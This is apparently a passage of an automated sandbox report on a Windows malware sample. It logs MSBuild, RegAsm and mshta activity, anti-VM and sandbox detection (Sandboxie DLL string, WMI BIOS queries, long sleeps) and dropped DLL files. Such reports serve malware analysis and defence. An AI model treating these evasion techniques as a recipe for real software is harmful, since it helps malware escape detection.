Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6656, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6344, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: MSBuild.exe, 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp, RegAsm.exe, 00000017.00000002.615009386.0000000000402000.00000040.00000001.sdmp, MSBuild.exe, 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, RegAsm.exe, 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp

Binary or memory string: SBIEDLL.DLL[SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6472	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6516	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5480	Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5480	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6172	Thread sleep count: 3674 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6172	Thread sleep count: 5665 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6900	Thread sleep count: 445 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6900	Thread sleep count: 350 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2596	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6708	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 491	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 3674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 5665
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 445

Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_3-21705
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_1-20112

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-H2SC5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\ServiceModelInstallRC.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-VLJFI.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-ITNUJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-0A4N9.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-VFATP.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HFMHC.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\ServiceModelEvents.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\webuser.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-EQBV6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\ServiceModelPerformanceCounters.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-5BN3G.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wukkzmi2\wukkzmi2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SbsNclPerf.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-VFATP.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HFMHC.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-SF1RP.tmp	Jump to dropped file
